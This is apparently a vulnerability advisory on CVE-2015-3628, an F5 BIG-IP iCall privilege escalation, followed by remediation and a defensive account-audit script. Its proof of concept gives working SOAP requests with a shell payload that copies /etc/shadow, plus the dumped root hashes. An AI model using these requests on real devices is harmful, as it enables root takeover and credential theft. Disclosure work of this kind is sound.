Analysis of privilege escalation vulnerability using F5 ICall script (CVE-2015-3628)


Earlier this year, GDS found a vulnerability in F5 BIG-IP LTM that allows a restricted user to elevate privileges and then extract data from the system and execute commands remotely as root.

This article shows how to exploit the vulnerability manually. Metasploit has also added a corresponding module; for details, see https://www.rapid7.com/db/modules/exploit/linux/http/f5_icall_cmd.

Summary

The vulnerability lies in the SOAP interface exposed over HTTPS at /iControl/iControlPortal.cgi (the same interface involved in CVE-2014-2928). An attacker with valid web interface credentials and the Resource Administrator role can abuse the iCall SOAP functions to execute arbitrary commands on the device as root.

The iCall interface can be used to create and run management scripts, which the Tcl interpreter executes as root. For the specific affected versions, see the F5 Security Advisory.

POC

The following shows how to read the "/etc/shadow" file (which contains the password hashes on the device). Using the same method, a command-line shell with root permission can also be obtained.

For the demonstration, we first create a user named "test" on the target device with the password "default" and the role "Resource Administrator". This user is not permitted to use any shell.

The following HTTP POST request creates an iCall script on the target device. The script definition is the payload exec /bin/sh -c "id>/var/local/ucs/file.ucs;cat /etc/shadow >>/var/local/ucs/file.ucs;chmod a+r /var/local/ucs/file.ucs".

The script itself produces no output. However, it copies the "/etc/shadow" file into the directory where backup configurations (UCS archives) are stored, from which it can be retrieved through the web interface, as demonstrated later. The output of the id command is recorded as well, to show that the script really runs with root permission.

Request:

POST /iControl/iControlPortal.cgi HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:iControl:iCall/Script
Host: 10.0.0.249
Content-Length: 866
Authorization: Basic dGVzdDpkZWZhdWx0=

(SOAP envelope; only attributes and values survived extraction, element tags are missing)
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:scr="urn:iControl:iCall/Script" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
    soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">exploit
        xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">exec /bin/sh -c "id>/var/local/ucs/file.ucs;cat /etc/shadow >>/var/local/ucs/file.ucs;chmod a+r /var/local/ucs/file.ucs"

Response:

HTTP/1.1 200 OK
Date: Fri, 26 Jun 2015 14:30:32 GMT
Server: Apache
SOAPServer: EasySoap++/0.6
X-Frame-Options: SAMEORIGIN
Content-Type: text/xml; charset="UTF-8"
Content-Length: 428

xmlns:E="http://schemas.xmlsoap.org/soap/envelope/" xmlns:A="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://www.w3.org/2001/XMLSchema-instance" xmlns:y="http://www.w3.org/2001/XMLSchema" xmlns:iControl="urn:iControl" E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    xmlns:m="urn:iControl:iCall/Script">

The iCall interface provides several handler types that trigger a script. In this case a PeriodicHandler is created with the following request.

Request:

POST /iControl/iControlPortal.cgi HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:iControl:iCall/PeriodicHandler
Host: 10.0.0.249
Content-Length: 923
Authorization: Basic dGVzdDpkZWZhdWx0=

(SOAP envelope; only attributes and values survived extraction, element tags are missing)
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:per="urn:iControl:iCall/PeriodicHandler" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
    soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">exploitHandler
        xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">/Common/exploit
        xsi:type="urn:Common.ULongSequence" soapenc:arrayType="xsd:long[]" xmlns:urn="urn:iControl">30

Response:

HTTP/1.1 200 OK
Date: Fri, 26 Jun 2015 14:36:30 GMT
Server: Apache
Set-Cookie: BIGIPAuthCookie=E41B1D179BD9DBF88AF1FF43F2390E5ED6BD6199; path=/; Secure;
Set-Cookie: BIGIPAuthUsernameCookie=test; path=/; Secure;
SOAPServer: EasySoap++/0.6
X-Frame-Options: SAMEORIGIN
Content-Type: text/xml; charset="UTF-8"
Content-Length: 428

xmlns:E="http://schemas.xmlsoap.org/soap/envelope/" xmlns:A="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://www.w3.org/2001/XMLSchema-instance" xmlns:y="http://www.w3.org/2001/XMLSchema" xmlns:iControl="urn:iControl" E:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    xmlns:m="urn:iControl:iCall/PeriodicHandler">

The script is executed every 30 seconds.

To view the file, log on to the device and open System -> Archives.


Download the file containing the command output. The result is as expected:

$ cat file.ucs
uid=0(root) gid=0(root) context=system_u:system_r:init_t
root:$1$8kIUIrbb$b7FOEXTrKOiOgJ1w0T78F/:16496:0:99999:7:::
bin:*:16153::::::
daemon:*:16153::::::
adm:*:16153::::::
lp:*:16153::::::
mail:*:16153::::::
uucp:*:16153::::::
operator:*:16153::::::
nobody:*:16153::::::
tmshnobody:*:16153::::::
admin:$1$VFlFWR0F$iIy0wXSbTl4EpmMYPnX1A.:16496:0:99999:7:::
apache:!!:16153::::::
mysql:!!:16153::::::
vcsa:!!:16153::::::
oprofile:!!:16153::::::
sshd:!!:16153::::::
syscheck:!!:16153::::::
rpc:!!:16153::::::
f5_remoteuser:!!:16153::::::
pcap:!!:16153::::::
tomcat:!!:16153::::::
ntp:!!:16153::::::
named:!!:16153::::::
test:$1$SO17paaX$hNC27dZsBM9l3kSFuY/h9.:16500:0:99999:7:::

Remediation

Apply the vendor patch. If you cannot patch, review which accounts hold the "Resource Administrator" role, reduce every account to the minimum role it needs, and treat the "Resource Administrator" role as equivalent to unrestricted root access on the device.
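As an added defender's check (not part of the original advisory), the script below parses the output of tmsh list auth user and reports every local account whose role is root-equivalent, including accounts whose shell is set to none. The tmsh output format and the role names admin and resource-admin are assumptions based on BIG-IP 11.x, and the sample output is constructed.

```python
"""Audit BIG-IP local accounts for root-equivalent roles (added example).
Input format assumed: `tmsh list auth user` (BIG-IP 11.x); sample is constructed."""
# Resource Administrator reaches root via iCall (CVE-2015-3628); admin is root by design.
ROOT_EQUIVALENT_ROLES = {"admin", "resource-admin"}

SAMPLE_TMSH_OUTPUT = """\
auth user test {
    partition-access {
        all-partitions {
            role resource-admin
        }
    }
    shell none
}
auth user viewer {
    partition-access {
        Common {
            role operator
        }
    }
}
"""

def parse_users(text: str) -> dict:
    """Return {user: {"roles": {partition: role}, "shell": str | None}}."""
    users, user, stack = {}, None, []
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        if line.endswith("{"):                       # a block opens
            stack.append(line[:-1].strip())
            if stack[-1].startswith("auth user "):
                user = stack[-1].split()[-1]
                users[user] = {"roles": {}, "shell": None}
        elif line == "}":                            # a block closes
            stack.pop()
        elif user is not None:
            key, _, value = line.partition(" ")
            if key == "role" and len(stack) > 2 and stack[-2] == "partition-access":
                users[user]["roles"][stack[-1]] = value
            elif key == "shell" and len(stack) == 1:
                users[user]["shell"] = value
    return users

def root_equivalent_accounts(text: str) -> list:
    """(user, partition, role, shell) for every grant that is effectively root."""
    findings = []
    for name, info in sorted(parse_users(text).items()):
        for partition, role in sorted(info["roles"].items()):
            if role in ROOT_EQUIVALENT_ROLES:     # 'shell none' does not limit these
                findings.append((name, partition, role, info["shell"] or "none"))
    return findings
```

Run it against the real tmsh output and every returned tuple is an account to patch around or demote; a shell of none is reported deliberately, since it did not stop the "test" user above from reaching root.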

Disclosure timeline

- Vulnerability reported to the F5 Security Team
- F5 confirmed the vulnerability and provided the affected versions
- F5 released version 12.0.0, which fixes the vulnerability
- F5 released version 11.5.3 HF2, which fixes the vulnerability
- F5 released version 11.6.0 HF6, which fixes the vulnerability
- 2015/11/19: Metasploit released the exploit module
